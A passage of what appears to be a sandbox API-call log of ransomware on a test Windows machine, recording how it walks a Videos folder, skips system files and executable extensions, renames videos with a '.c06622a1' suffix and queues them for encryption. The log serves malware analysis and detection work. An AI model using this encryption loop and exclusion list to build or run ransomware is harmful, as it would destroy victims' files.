RtlComputeCrc32 (PartialCrc=0xca49, Buffer=0x32e9a4, Length=0x80) returned 0x5611bd78 [0168.347] RtlComputeCrc32 (PartialCrc=0xbd78, Buffer=0x32e9a4, Length=0x80) returned 0x7184d2f1 [0168.347] RtlComputeCrc32 (PartialCrc=0xd2f1, Buffer=0x32e9a4, Length=0x80) returned 0xd58b3622 [0168.347] RtlComputeCrc32 (PartialCrc=0x3622, Buffer=0x32e9a4, Length=0x80) returned 0x72f32dfa [0168.347] CloseHandle (hObject=0x1d0) returned 1 [0168.347] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.347] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\rukKt9s_dMef3uJS.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\rukKt9s_dMef3uJS.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\rukKt9s_dMef3uJS.mp4" [0168.347] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\rukKt9s_dMef3uJS.mp4") returned 0x4d [0168.347] wcscpy (in: _Dest=0x3250102, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.347] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\rukKt9s_dMef3uJS.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\rukkt9s_dmef3ujs.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\rukKt9s_dMef3uJS.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\rukkt9s_dmef3ujs.mp4.c06622a1"), dwFlags=0x8) returned 1 [0168.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\rukKt9s_dMef3uJS.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\rukkt9s_dmef3ujs.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d0 [0168.350] CreateIoCompletionPort (FileHandle=0x1d0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0168.351] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x39e0020 [0168.360] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x55c535d3 [0168.360] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x22f4d09 [0168.360] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x21914a19 [0168.360] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xdf12437 [0168.360] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xec4c3f6 [0168.360] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xe29799c [0168.360] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x60859168 [0168.360] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6f15364 [0168.365] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x39e0094, Length=0x80) returned 0xa6f09804 [0168.365] RtlComputeCrc32 (PartialCrc=0x9804, Buffer=0x39e0094, Length=0x80) returned 0xea303d74 [0168.365] RtlComputeCrc32 (PartialCrc=0x3d74, Buffer=0x39e0094, Length=0x80) returned 0xfe694315 [0168.365] RtlComputeCrc32 (PartialCrc=0x4315, Buffer=0x39e0094, Length=0x80) returned 0x5228a774 [0168.365] RtlComputeCrc32 (PartialCrc=0xa774, Buffer=0x39e0094, Length=0x80) returned 0x1796bc19 [0168.365] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x39e0020) returned 1 [0168.365] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.365] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.365] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a1f9a30, ftCreationTime.dwHighDateTime=0x1d5dea0, ftLastAccessTime.dwLowDateTime=0xa42d9c00, ftLastAccessTime.dwHighDateTime=0x1d5e5ed, ftLastWriteTime.dwLowDateTime=0xa42d9c00, ftLastWriteTime.dwHighDateTime=0x1d5e5ed, nFileSizeHigh=0x0, nFileSizeLow=0x14587, dwReserved0=0x0, dwReserved1=0x0, cFileName="RzCnZ3w0Un.avi", cAlternateFileName="RZCNZ3~1.AVI")) returned 1 [0168.365] _wcsicmp (_Str1="RzCnZ3w0Un.avi", _Str2="README.c06622a1.TXT") returned 21 [0168.365] wcsstr (_Str="RzCnZ3w0Un.avi", _SubStr="README") returned 0x0 [0168.365] _wcsicmp (_Str1="autorun.inf", _Str2="RzCnZ3w0Un.avi") returned -17 [0168.365] wcslen (_String="autorun.inf") returned 0xb [0168.365] _wcsicmp (_Str1="boot.ini", _Str2="RzCnZ3w0Un.avi") returned -16 [0168.365] wcslen (_String="boot.ini") returned 0x8 [0168.366] _wcsicmp (_Str1="bootfont.bin", _Str2="RzCnZ3w0Un.avi") returned -16 [0168.366] wcslen (_String="bootfont.bin") returned 0xc [0168.366] _wcsicmp (_Str1="bootsect.bak", _Str2="RzCnZ3w0Un.avi") returned -16 [0168.366] wcslen (_String="bootsect.bak") returned 0xc [0168.366] _wcsicmp (_Str1="desktop.ini", _Str2="RzCnZ3w0Un.avi") returned -14 [0168.366] wcslen (_String="desktop.ini") returned 0xb [0168.366] _wcsicmp (_Str1="iconcache.db", _Str2="RzCnZ3w0Un.avi") returned -9 [0168.366] wcslen (_String="iconcache.db") returned 0xc [0168.366] _wcsicmp (_Str1="ntldr", _Str2="RzCnZ3w0Un.avi") returned -4 [0168.366] wcslen (_String="ntldr") returned 0x5 [0168.366] _wcsicmp (_Str1="ntuser.dat", _Str2="RzCnZ3w0Un.avi") returned -4 [0168.366] wcslen (_String="ntuser.dat") returned 0xa [0168.366] _wcsicmp (_Str1="ntuser.dat.log", _Str2="RzCnZ3w0Un.avi") returned -4 [0168.366] wcslen (_String="ntuser.dat.log") returned 0xe [0168.366] _wcsicmp (_Str1="ntuser.ini", _Str2="RzCnZ3w0Un.avi") returned -4 [0168.366] wcslen (_String="ntuser.ini") returned 0xa [0168.366] _wcsicmp (_Str1="thumbs.db", _Str2="RzCnZ3w0Un.avi") returned 2 [0168.366] wcslen (_String="thumbs.db") returned 0x9 [0168.366] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0168.366] wcslen (_String="386") returned 0x3 [0168.366] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0168.366] wcslen (_String="adv") returned 0x3 [0168.366] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0168.366] wcslen (_String="ani") returned 0x3 [0168.367] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0168.367] wcslen (_String="bat") returned 0x3 [0168.367] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0168.367] wcslen (_String="bin") returned 0x3 [0168.367] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0168.367] wcslen (_String="cab") returned 0x3 [0168.367] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0168.367] wcslen (_String="cmd") returned 0x3 [0168.367] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0168.367] wcslen (_String="com") returned 0x3 [0168.367] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0168.367] wcslen (_String="cpl") returned 0x3 [0168.367] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0168.367] wcslen (_String="cur") returned 0x3 [0168.367] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0168.367] wcslen (_String="deskthemepack") returned 0xd [0168.367] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0168.367] wcslen (_String="diagcab") returned 0x7 [0168.367] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0168.367] wcslen (_String="diagcfg") returned 0x7 [0168.367] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0168.367] wcslen (_String="diagpkg") returned 0x7 [0168.367] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0168.367] wcslen (_String="dll") returned 0x3 [0168.367] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0168.367] wcslen (_String="drv") returned 0x3 [0168.368] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0168.368] wcslen (_String="exe") returned 0x3 [0168.368] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0168.368] wcslen (_String="hlp") returned 0x3 [0168.368] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0168.368] wcslen (_String="icl") returned 0x3 [0168.368] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0168.368] wcslen (_String="icns") returned 0x4 [0168.368] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0168.368] wcslen (_String="ico") returned 0x3 [0168.368] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0168.368] wcslen (_String="ics") returned 0x3 [0168.368] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0168.368] wcslen (_String="idx") returned 0x3 [0168.368] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0168.368] wcslen (_String="ldf") returned 0x3 [0168.368] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0168.368] wcslen (_String="lnk") returned 0x3 [0168.368] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0168.368] wcslen (_String="mod") returned 0x3 [0168.368] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0168.368] wcslen (_String="mpa") returned 0x3 [0168.368] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0168.368] wcslen (_String="msc") returned 0x3 [0168.368] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0168.369] wcslen (_String="msp") returned 0x3 [0168.369] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0168.369] wcslen (_String="msstyles") returned 0x8 [0168.369] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0168.369] wcslen (_String="msu") returned 0x3 [0168.369] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0168.369] wcslen (_String="nls") returned 0x3 [0168.369] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0168.369] wcslen (_String="nomedia") returned 0x7 [0168.369] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0168.369] wcslen (_String="ocx") returned 0x3 [0168.369] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0168.369] wcslen (_String="prf") returned 0x3 [0168.369] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0168.369] wcslen (_String="ps1") returned 0x3 [0168.369] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0168.369] wcslen (_String="rom") returned 0x3 [0168.369] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0168.369] wcslen (_String="rtp") returned 0x3 [0168.369] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0168.369] wcslen (_String="scr") returned 0x3 [0168.369] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0168.369] wcslen (_String="shs") returned 0x3 [0168.369] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0168.369] wcslen (_String="spl") returned 0x3 [0168.369] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0168.370] wcslen (_String="sys") returned 0x3 [0168.370] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0168.370] wcslen (_String="theme") returned 0x5 [0168.370] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0168.370] wcslen (_String="themepack") returned 0x9 [0168.370] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0168.370] wcslen (_String="wpx") returned 0x3 [0168.370] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0168.370] wcslen (_String="lock") returned 0x4 [0168.370] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0168.370] wcslen (_String="key") returned 0x3 [0168.370] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0168.370] wcslen (_String="hta") returned 0x3 [0168.370] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0168.370] wcslen (_String="msi") returned 0x3 [0168.370] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0168.370] wcslen (_String="pdb") returned 0x3 [0168.370] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0168.370] wcslen (_String="sqlite") returned 0x6 [0168.370] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz")) returned 0x10 [0168.370] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.371] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" [0168.371] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned 0x38 [0168.371] wcscpy (in: _Dest=0x32400d2, _Source="RzCnZ3w0Un.avi" | out: _Dest="RzCnZ3w0Un.avi") returned="RzCnZ3w0Un.avi" [0168.371] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\RzCnZ3w0Un.avi", dwFileAttributes=0x80) returned 1 [0168.371] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\RzCnZ3w0Un.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\rzcnz3w0un.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0168.371] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.371] ReadFile (in: hFile=0x1c0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.372] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xaa87a458 [0168.372] RtlComputeCrc32 (PartialCrc=0xa458, Buffer=0x32e9a4, Length=0x80) returned 0x5871aeb8 [0168.372] RtlComputeCrc32 (PartialCrc=0xaeb8, Buffer=0x32e9a4, Length=0x80) returned 0xc97d4d8a [0168.373] RtlComputeCrc32 (PartialCrc=0x4d8a, Buffer=0x32e9a4, Length=0x80) returned 0x7fca31a5 [0168.373] RtlComputeCrc32 (PartialCrc=0x31a5, Buffer=0x32e9a4, Length=0x80) returned 0x8b2f1bde [0168.373] CloseHandle (hObject=0x1c0) returned 1 [0168.373] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.373] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\RzCnZ3w0Un.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\RzCnZ3w0Un.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\RzCnZ3w0Un.avi" [0168.373] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\RzCnZ3w0Un.avi") returned 0x47 [0168.373] wcscpy (in: _Dest=0x32500f6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.373] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\RzCnZ3w0Un.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\rzcnz3w0un.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\RzCnZ3w0Un.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\rzcnz3w0un.avi.c06622a1"), dwFlags=0x8) returned 1 [0168.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\RzCnZ3w0Un.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\rzcnz3w0un.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c0 [0168.377] CreateIoCompletionPort (FileHandle=0x1c0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0168.377] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3a70020 [0168.386] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4f6a05c1 [0168.386] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x55bc1e90 [0168.386] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5ce4fb6b [0168.386] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4c4be653 [0168.386] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xd946bd1 [0168.386] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x31080779 [0168.386] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xfd68f44 [0168.386] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2c46a5a8 [0168.390] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3a70094, Length=0x80) returned 0x99302d3f [0168.390] RtlComputeCrc32 (PartialCrc=0x2d3f, Buffer=0x3a70094, Length=0x80) returned 0xd25778f0 [0168.391] RtlComputeCrc32 (PartialCrc=0x78f0, Buffer=0x3a70094, Length=0x80) returned 0xd48f3452 [0168.391] RtlComputeCrc32 (PartialCrc=0x3452, Buffer=0x3a70094, Length=0x80) returned 0x163fd097 [0168.391] RtlComputeCrc32 (PartialCrc=0xd097, Buffer=0x3a70094, Length=0x80) returned 0x8cb6aa06 [0168.391] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3a70020) returned 1 [0168.391] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.391] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.391] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56b500a0, ftCreationTime.dwHighDateTime=0x1d5e51e, ftLastAccessTime.dwLowDateTime=0xf729670, ftLastAccessTime.dwHighDateTime=0x1d5e777, ftLastWriteTime.dwLowDateTime=0xf729670, ftLastWriteTime.dwHighDateTime=0x1d5e777, nFileSizeHigh=0x0, nFileSizeLow=0x118e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="WLHz66im9n OAN9lvyaW.flv", cAlternateFileName="WLHZ66~1.FLV")) returned 1 [0168.391] _wcsicmp (_Str1="WLHz66im9n OAN9lvyaW.flv", _Str2="README.c06622a1.TXT") returned 5 [0168.391] wcsstr (_Str="WLHz66im9n OAN9lvyaW.flv", _SubStr="README") returned 0x0 [0168.391] _wcsicmp (_Str1="autorun.inf", _Str2="WLHz66im9n OAN9lvyaW.flv") returned -22 [0168.391] wcslen (_String="autorun.inf") returned 0xb [0168.391] _wcsicmp (_Str1="boot.ini", _Str2="WLHz66im9n OAN9lvyaW.flv") returned -21 [0168.391] wcslen (_String="boot.ini") returned 0x8 [0168.391] _wcsicmp (_Str1="bootfont.bin", _Str2="WLHz66im9n OAN9lvyaW.flv") returned -21 [0168.391] wcslen (_String="bootfont.bin") returned 0xc [0168.391] _wcsicmp (_Str1="bootsect.bak", _Str2="WLHz66im9n OAN9lvyaW.flv") returned -21 [0168.391] wcslen (_String="bootsect.bak") returned 0xc [0168.391] _wcsicmp (_Str1="desktop.ini", _Str2="WLHz66im9n OAN9lvyaW.flv") returned -19 [0168.391] wcslen (_String="desktop.ini") returned 0xb [0168.391] _wcsicmp (_Str1="iconcache.db", _Str2="WLHz66im9n OAN9lvyaW.flv") returned -14 [0168.391] wcslen (_String="iconcache.db") returned 0xc [0168.391] _wcsicmp (_Str1="ntldr", _Str2="WLHz66im9n OAN9lvyaW.flv") returned -9 [0168.392] wcslen (_String="ntldr") returned 0x5 [0168.392] _wcsicmp (_Str1="ntuser.dat", _Str2="WLHz66im9n OAN9lvyaW.flv") returned -9 [0168.392] wcslen (_String="ntuser.dat") returned 0xa [0168.392] _wcsicmp (_Str1="ntuser.dat.log", _Str2="WLHz66im9n OAN9lvyaW.flv") returned -9 [0168.392] wcslen (_String="ntuser.dat.log") returned 0xe [0168.392] _wcsicmp (_Str1="ntuser.ini", _Str2="WLHz66im9n OAN9lvyaW.flv") returned -9 [0168.392] wcslen (_String="ntuser.ini") returned 0xa [0168.392] _wcsicmp (_Str1="thumbs.db", _Str2="WLHz66im9n OAN9lvyaW.flv") returned -3 [0168.392] wcslen (_String="thumbs.db") returned 0x9 [0168.392] _wcsicmp (_Str1="386", _Str2="flv") returned -51 [0168.392] wcslen (_String="386") returned 0x3 [0168.392] _wcsicmp (_Str1="adv", _Str2="flv") returned -5 [0168.392] wcslen (_String="adv") returned 0x3 [0168.392] _wcsicmp (_Str1="ani", _Str2="flv") returned -5 [0168.392] wcslen (_String="ani") returned 0x3 [0168.392] _wcsicmp (_Str1="bat", _Str2="flv") returned -4 [0168.392] wcslen (_String="bat") returned 0x3 [0168.392] _wcsicmp (_Str1="bin", _Str2="flv") returned -4 [0168.392] wcslen (_String="bin") returned 0x3 [0168.392] _wcsicmp (_Str1="cab", _Str2="flv") returned -3 [0168.392] wcslen (_String="cab") returned 0x3 [0168.392] _wcsicmp (_Str1="cmd", _Str2="flv") returned -3 [0168.392] wcslen (_String="cmd") returned 0x3 [0168.392] _wcsicmp (_Str1="com", _Str2="flv") returned -3 [0168.393] wcslen (_String="com") returned 0x3 [0168.393] _wcsicmp (_Str1="cpl", _Str2="flv") returned -3 [0168.393] wcslen (_String="cpl") returned 0x3 [0168.393] _wcsicmp (_Str1="cur", _Str2="flv") returned -3 [0168.393] wcslen (_String="cur") returned 0x3 [0168.393] _wcsicmp (_Str1="deskthemepack", _Str2="flv") returned -2 [0168.393] wcslen (_String="deskthemepack") returned 0xd [0168.393] _wcsicmp (_Str1="diagcab", _Str2="flv") returned -2 [0168.393] wcslen (_String="diagcab") returned 0x7 [0168.393] _wcsicmp (_Str1="diagcfg", _Str2="flv") returned -2 [0168.393] wcslen (_String="diagcfg") returned 0x7 [0168.393] _wcsicmp (_Str1="diagpkg", _Str2="flv") returned -2 [0168.393] wcslen (_String="diagpkg") returned 0x7 [0168.393] _wcsicmp (_Str1="dll", _Str2="flv") returned -2 [0168.393] wcslen (_String="dll") returned 0x3 [0168.393] _wcsicmp (_Str1="drv", _Str2="flv") returned -2 [0168.393] wcslen (_String="drv") returned 0x3 [0168.393] _wcsicmp (_Str1="exe", _Str2="flv") returned -1 [0168.393] wcslen (_String="exe") returned 0x3 [0168.393] _wcsicmp (_Str1="hlp", _Str2="flv") returned 2 [0168.393] wcslen (_String="hlp") returned 0x3 [0168.393] _wcsicmp (_Str1="icl", _Str2="flv") returned 3 [0168.393] wcslen (_String="icl") returned 0x3 [0168.393] _wcsicmp (_Str1="icns", _Str2="flv") returned 3 [0168.393] wcslen (_String="icns") returned 0x4 [0168.394] _wcsicmp (_Str1="ico", _Str2="flv") returned 3 [0168.394] wcslen (_String="ico") returned 0x3 [0168.394] _wcsicmp (_Str1="ics", _Str2="flv") returned 3 [0168.394] wcslen (_String="ics") returned 0x3 [0168.394] _wcsicmp (_Str1="idx", _Str2="flv") returned 3 [0168.394] wcslen (_String="idx") returned 0x3 [0168.394] _wcsicmp (_Str1="ldf", _Str2="flv") returned 6 [0168.394] wcslen (_String="ldf") returned 0x3 [0168.394] _wcsicmp (_Str1="lnk", _Str2="flv") returned 6 [0168.394] wcslen (_String="lnk") returned 0x3 [0168.394] _wcsicmp (_Str1="mod", _Str2="flv") returned 7 [0168.394] wcslen (_String="mod") returned 0x3 [0168.394] _wcsicmp (_Str1="mpa", _Str2="flv") returned 7 [0168.394] wcslen (_String="mpa") returned 0x3 [0168.394] _wcsicmp (_Str1="msc", _Str2="flv") returned 7 [0168.394] wcslen (_String="msc") returned 0x3 [0168.394] _wcsicmp (_Str1="msp", _Str2="flv") returned 7 [0168.394] wcslen (_String="msp") returned 0x3 [0168.394] _wcsicmp (_Str1="msstyles", _Str2="flv") returned 7 [0168.394] wcslen (_String="msstyles") returned 0x8 [0168.394] _wcsicmp (_Str1="msu", _Str2="flv") returned 7 [0168.394] wcslen (_String="msu") returned 0x3 [0168.394] _wcsicmp (_Str1="nls", _Str2="flv") returned 8 [0168.394] wcslen (_String="nls") returned 0x3 [0168.395] _wcsicmp (_Str1="nomedia", _Str2="flv") returned 8 [0168.395] wcslen (_String="nomedia") returned 0x7 [0168.395] _wcsicmp (_Str1="ocx", _Str2="flv") returned 9 [0168.395] wcslen (_String="ocx") returned 0x3 [0168.395] _wcsicmp (_Str1="prf", _Str2="flv") returned 10 [0168.395] wcslen (_String="prf") returned 0x3 [0168.395] _wcsicmp (_Str1="ps1", _Str2="flv") returned 10 [0168.395] wcslen (_String="ps1") returned 0x3 [0168.395] _wcsicmp (_Str1="rom", _Str2="flv") returned 12 [0168.395] wcslen (_String="rom") returned 0x3 [0168.395] _wcsicmp (_Str1="rtp", _Str2="flv") returned 12 [0168.395] wcslen (_String="rtp") returned 0x3 [0168.395] _wcsicmp (_Str1="scr", _Str2="flv") returned 13 [0168.395] wcslen (_String="scr") returned 0x3 [0168.395] _wcsicmp (_Str1="shs", _Str2="flv") returned 13 [0168.395] wcslen (_String="shs") returned 0x3 [0168.395] _wcsicmp (_Str1="spl", _Str2="flv") returned 13 [0168.395] wcslen (_String="spl") returned 0x3 [0168.395] _wcsicmp (_Str1="sys", _Str2="flv") returned 13 [0168.395] wcslen (_String="sys") returned 0x3 [0168.395] _wcsicmp (_Str1="theme", _Str2="flv") returned 14 [0168.395] wcslen (_String="theme") returned 0x5 [0168.395] _wcsicmp (_Str1="themepack", _Str2="flv") returned 14 [0168.395] wcslen (_String="themepack") returned 0x9 [0168.396] _wcsicmp (_Str1="wpx", _Str2="flv") returned 17 [0168.396] wcslen (_String="wpx") returned 0x3 [0168.396] _wcsicmp (_Str1="lock", _Str2="flv") returned 6 [0168.396] wcslen (_String="lock") returned 0x4 [0168.396] _wcsicmp (_Str1="key", _Str2="flv") returned 5 [0168.396] wcslen (_String="key") returned 0x3 [0168.396] _wcsicmp (_Str1="hta", _Str2="flv") returned 2 [0168.396] wcslen (_String="hta") returned 0x3 [0168.396] _wcsicmp (_Str1="msi", _Str2="flv") returned 7 [0168.396] wcslen (_String="msi") returned 0x3 [0168.396] _wcsicmp (_Str1="pdb", _Str2="flv") returned 10 [0168.396] wcslen (_String="pdb") returned 0x3 [0168.396] _wcsicmp (_Str1="sqlite", _Str2="flv") returned 13 [0168.396] wcslen (_String="sqlite") returned 0x6 [0168.396] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" (normalized: "c:\\users\\5p5nrgjn0js 